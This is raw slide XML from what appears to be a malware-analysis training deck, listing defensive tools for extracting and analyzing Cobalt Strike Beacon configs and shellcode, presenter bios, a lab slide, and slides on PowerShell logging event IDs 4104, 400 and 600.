                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Tool</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="165654" marR="165654" marT="165654" marB="165654" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="1" cap="none" spc="150" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Notes</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="165654" marR="165654" marT="165654" marB="165654" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2721110842"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="622900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914309" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" u="none" strike="noStrike" cap="none" spc="0" baseline="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Cobaltstrike</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" u="none" strike="noStrike" cap="none" spc="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-config-extractor</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" cap="none"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65654" marR="165654" marT="165654" marB="165654"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"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Easy pip-based install with very strong analysis capabilities</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="165654" marR="165654" marT="165654" marB="165654"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2072235604"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="799623">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>CobaltStrikeParser</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" cap="none" spc="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65654" marR="165654" marT="165654" marB="165654"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"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One of the original parsers that became popular. Scripts to both extract and analyze Beacon configs.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="165654" marR="165654" marT="165654" marB="165654"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1117218266"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="799623">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1"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Didier Stevens’ “1768.py”</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="165654" marR="165654" marT="165654" marB="165654"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"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Capable of analyzing multiple payload types </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" i="1"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including</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" i="0" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> shellcode (this is the best tool for CS shellcode analysis!)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" cap="none" spc="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65654" marR="165654" marT="165654" marB="165654"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2044946964"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="799623">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Te-k Parser</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" cap="none" spc="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65654" marR="165654" marT="165654" marB="165654"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" cap="none" spc="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Multiple scripts for analyzing &amp; extracting CS Beacons along with scanners to generate/review Yara rules</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="165654" marR="165654" marT="165654" marB="165654"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1071926481"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="799623">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" cap="none"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Avast </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" cap="none" spc="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Cobaltstrike</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" cap="none" spc="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Tools &amp; Yara Rules</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="165654" marR="165654" marT="165654" marB="165654"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" cap="none"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 multitude of tools for CS payload analysis including tools for assist with API hashing, checksum generation, analysis in IDA Pro, and more</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="165654" marR="165654" marT="165654" marB="165654"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3599853248"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="601489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89B0699-F6D3-7E4B-A0BF-16FC1DDC739A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="4390" b="36704"/>
          <a:stretch/>
        </p:blipFill>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noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0173A1B0-FB25-6843-ABF4-102C929C9AE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432000" y="432000"/>
            <a:ext cx="5472000" cy="432000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>About Josh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05A31BB0-9C4B-6F43-8397-2031E31A57B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="32"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431801" y="1008000"/>
            <a:ext cx="5472000" cy="360000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Researcher and Consultant</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80C87562-37F8-D047-88EC-4FFEBC8B2014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431999" y="1511565"/>
            <a:ext cx="5929043" cy="5088017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Google (Chronicle)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse engineer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>M9 Cyber</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cyber security consulting</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pluralsight</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Author in malware analysis and reverse engineering</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9820891C-21B4-0748-B5B5-F1A502383D85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8314432" y="6018511"/>
            <a:ext cx="1238224" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jstrosch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400098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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="27" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="28" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" nodeType="after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animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="3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A6E27-3A5A-0EDB-768C-60FB8743EF4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="382993" y="278658"/>
            <a:ext cx="3164880" cy="922137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>LAB TIME!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3745A447-BAC4-6710-F18F-D234329796EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4516881" y="0"/>
            <a:ext cx="5337887" cy="6870192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3716140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01369D5E-F65D-BBEE-48B4-74FC18CB2D33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="52322" y="1243584"/>
            <a:ext cx="12087355" cy="5614416"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65239452-846C-7E61-9427-0820E069145A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639024" y="185469"/>
            <a:ext cx="10175514" cy="922137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Event ID 4104</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: PS Script Block Logging</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" cap="none" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2988957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5239452-846C-7E61-9427-0820E069145A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639024" y="201891"/>
            <a:ext cx="10175514" cy="922137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Event ID 400</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: Engine State Changes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Event ID 600</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WSMan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Activity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" cap="none" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49"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E090D199-DD9F-F6B9-5D19-C7B4C740A238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="80189" y="1255777"/>
            <a:ext cx="12031622" cy="5602224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414423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3DFB9-88AF-7A4F-A9F3-A8456C622CD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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357000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73A1B0-FB25-6843-ABF4-102C929C9AE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432000" y="432000"/>
            <a:ext cx="5472000" cy="432000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>About Aaron</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05A31BB0-9C4B-6F43-8397-2031E31A57B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="32"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431801" y="1008000"/>
            <a:ext cx="5472000" cy="360000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Monkey Tamer at your local z00</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80C87562-37F8-D047-88EC-4FFEBC8B2014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431999" y="1511565"/>
            <a:ext cx="5929043" cy="5088017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hi!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
